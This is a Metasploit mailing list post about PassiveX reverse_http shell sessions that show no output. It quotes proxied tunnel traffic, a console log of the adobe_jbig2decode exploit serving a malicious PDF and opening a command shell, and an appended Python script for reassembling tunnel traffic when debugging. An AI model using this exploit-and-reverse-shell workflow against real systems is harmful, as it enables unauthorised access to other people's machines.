Metasploit mailing list archives

problem with passiveX (reverse_http) payloads: nothing in return to commands


From: irian2003 at yahoo.com (Bogdan Sandu)
Date: Fri, 3 Apr 2009 14:53:28 -0700 (PDT)

Hello,

I have a problem with the reverse_http payloads.
The exploit succeeds, and looking with tcpdump at the traffic between the proxy server and the payload's port I see 
the commands being executed, but after interacting with the session I see nothing returned for my commands:

----------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

HTTP/1.1 200 OK
Content-Length: 4
Server: Rex
Connection: close

Dir
------------------------------------
GET /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_out HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive
-----------------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Content-Length: 1024
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

dir
 Volume in drive C has no label.
 Volume Serial Number is 0CAA-3013

 Directory of C:\Documents and Settings\irian\Desktop

04/03/2009  11:43 PM    <DIR>          .
04/03/2009  11:43 PM    <DIR>          ..
04/01/2009  10:09 AM            27,136 Activ.doc
02/27/2009  12:09 PM           169,984 carte optional.doc
03/07/2009  12:48 PM               131 jboss.txt
04/02/2009  03:48 AM           288,237 lo.cap
03/30/2009  12:17 P
HTTP/1.1 200 OK
Content-Length: 0
Server: Rex
Connection: Keep-Alive
-----------------------------
POST /hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb/tunnel_in HTTP/1.0
X-Sid: sid=2
Host: 0.0.0.0:8081
Content-Length: 230
Pragma: no-cache
Via: 1.1 xyz.com (squid/3.0.STABLE8)
X-Forwarded-For: 127.0.0.1
Cache-Control: max-age=259200
Connection: keep-alive

M           247,666 users_guide.pdf
03/25/2009  10:32 PM            24,064 youtube.doc
              15 File(s)      2,111,721 bytes
               3 Dir(s)     959,123,456 bytes free

C:\Documents and Settings\irian\Desktop>
HTTP/1.1 200 OK
Content-Length: 0
Server: Rex
Connection: Keep-Alive
----------------------------------------

msf exploit(adobe_jbig2decode) > exploit
[*] Exploit running as background job.
msf exploit(adobe_jbig2decode) >
[*] PassiveX listener started.
[*] Using URL: http://0.0.0.0:8080/carti.pdf
[*]  Local IP: http://1.2.3.4:8080/carti.pdf
[*] Server started.
[*] Sending Adobe JBIG2Decode Memory Corruption Exploit to 1.2.3.4:50007...
[*] Sending PassiveX main page to client
[*] Sending PassiveX main page to client
[*] Command shell session 1 opened (Local Pipe -> Remote Pipe)
[*] Sending stage to sid 2 (474 bytes)

msf exploit(adobe_jbig2decode) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  Local Pipe -> Remote Pipe

msf exploit(adobe_jbig2decode) > sessions -i 1
[*] Starting interaction with 1...

ls
dir
dir

Any ideas why this is happening? Thanks a lot, and keep doing a great job.

Bogdan

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090403/048cef1b/attachment.htm>
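[Editor's note, not part of the original message.] The capture quoted above shows the two halves of the PassiveX reverse_http tunnel as they cross the squid proxy: the payload polls GET .../tunnel_out and the listener's reply body carries the bytes handed to the shell (here "Dir", Content-Length 4), and the payload POSTs the shell's output to .../tunnel_in in chunks (here 1024 and 230 bytes, the first one cut in the middle of "PM"). Both requests carry an X-Sid header naming the session. When the console shows nothing but the POST bodies clearly contain the dir listing, it helps to reassemble each direction per sid straight from the capture and compare it with what msfconsole displays. The script below does that; it is an added example for this thread and is not part of Metasploit or of the original message. Everything it relies on is what the capture shows (the tunnel_out/tunnel_in paths, the X-Sid header, Content-Length on both sides); the sample capture embedded in it is constructed from the post's excerpt, with one header per line, CRLF delimiters restored and the listing abridged.

```python
"""Reassemble both directions of a PassiveX reverse_http tunnel from an
ASCII capture like the one quoted in the post above.

Added example for this thread; not part of Metasploit or of the original
message.  It relies only on what the capture shows: the payload polls
GET .../tunnel_out and the listener's reply body carries the bytes for the
shell; the payload POSTs the shell's output to .../tunnel_in; both requests
carry an X-Sid header naming the session.
"""
import re
from dataclasses import dataclass, field

SID_PATH = "/hbLgd5pD8joBEeF1XFUkjfH5ofVtkoYb"   # URI prefix seen in the capture

# Constructed payloads: the command the listener hands down, and the shell
# output split across two POSTs the way the post's 1024-byte chunk cut "PM".
CMD = "dir\n"
OUT1 = ("dir\r\n Volume in drive C has no label.\r\n"
        " 04/03/2009  11:43 PM    <DIR>          .\r\n"
        " 03/30/2009  12:17 P")
OUT2 = ("M           247,666 users_guide.pdf\r\n"
        "C:\\Documents and Settings\\irian\\Desktop>")


def _tunnel_out(reply=None):
    """Constructed GET poll via the squid proxy; `reply` is the listener's answer, if any."""
    msg = (f"GET {SID_PATH}/tunnel_out HTTP/1.0\r\nX-Sid: sid=2\r\n"
           "Host: 0.0.0.0:8081\r\nVia: 1.1 xyz.com (squid/3.0.STABLE8)\r\n\r\n")
    if reply is not None:
        msg += (f"HTTP/1.1 200 OK\r\nContent-Length: {len(reply)}\r\n"
                f"Server: Rex\r\nConnection: close\r\n\r\n{reply}")
    return msg


def _tunnel_in(body):
    """Constructed POST of shell output, followed by the listener's empty 200 as in the capture."""
    return (f"POST {SID_PATH}/tunnel_in HTTP/1.0\r\nX-Sid: sid=2\r\n"
            f"Host: 0.0.0.0:8081\r\nContent-Length: {len(body)}\r\n"
            "Via: 1.1 xyz.com (squid/3.0.STABLE8)\r\n\r\n"
            f"{body}HTTP/1.1 200 OK\r\nContent-Length: 0\r\nServer: Rex\r\n"
            "Connection: Keep-Alive\r\n\r\n")


# Constructed capture: messages separated by dashed lines, as in the post.
SAMPLE_CAPTURE = "\n-----\n".join(
    [_tunnel_out(CMD), _tunnel_out(), _tunnel_in(OUT1), _tunnel_in(OUT2)]) + "\n-----\n"


@dataclass
class TunnelSession:
    sid: str
    polls: int = 0                                  # tunnel_out GETs, empty ones included
    commands: list = field(default_factory=list)    # bytes the listener sent down to the shell
    output: str = ""                                # tunnel_in bodies concatenated in order


def _split_message(raw):
    """Return (start line, lower-cased header dict, body) for one HTTP message."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_capture(text):
    """Group tunnel traffic by X-Sid; each dashed-line-delimited chunk is one request."""
    sessions = {}
    for chunk in re.split(r"^-{5,}$", text, flags=re.M):
        chunk = chunk.lstrip("\r\n")
        m = re.match(r"(GET|POST) (\S+) HTTP/1\.[01]\r\n", chunk)
        if not m:
            continue
        method, path = m.groups()
        _, headers, rest = _split_message(chunk)
        sid = re.sub(r"^sid=", "", headers.get("x-sid", "?"))
        sess = sessions.setdefault(sid, TunnelSession(sid))
        if method == "GET" and path.endswith("/tunnel_out"):
            sess.polls += 1
            if rest.startswith("HTTP/"):             # the listener answered this poll
                _, rh, reply = _split_message(rest)
                n = int(rh.get("content-length", "0"))
                if n:
                    sess.commands.append(reply[:n])  # capture is ASCII: 1 char == 1 byte
        elif method == "POST" and path.endswith("/tunnel_in"):
            if "content-length" in headers:
                rest = rest[:int(headers["content-length"])]
            else:                                    # body runs straight into the listener's reply
                rest = rest.split("HTTP/1.", 1)[0]
            sess.output += rest
    return sessions


def summarize(sessions):
    """Per-sid counters to compare against what the msfconsole session shows."""
    return {sid: {"polls": s.polls, "commands": len(s.commands),
                  "output_bytes": len(s.output)}
            for sid, s in sessions.items()}


if __name__ == "__main__":
    found = parse_capture(SAMPLE_CAPTURE)
    print(summarize(found))
    for sid, s in found.items():
        print(f"sid {sid} sent to shell: {s.commands!r}")
        print(f"sid {sid} output from shell:\n{s.output}")
```

Run against a real dump, the interesting comparison is output_bytes per sid versus what the interactive session printed: if the reassembled output contains the listing but the console shows nothing, the bytes made it through the proxy to the listener and the loss is on the framework side of the tunnel rather than on the network; if the tunnel_in bodies are empty or missing, the payload never sent the output back. Content-Length is honoured on both directions because, as the capture shows, a POST body runs straight into the listener's 200 reply with no separator between them.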

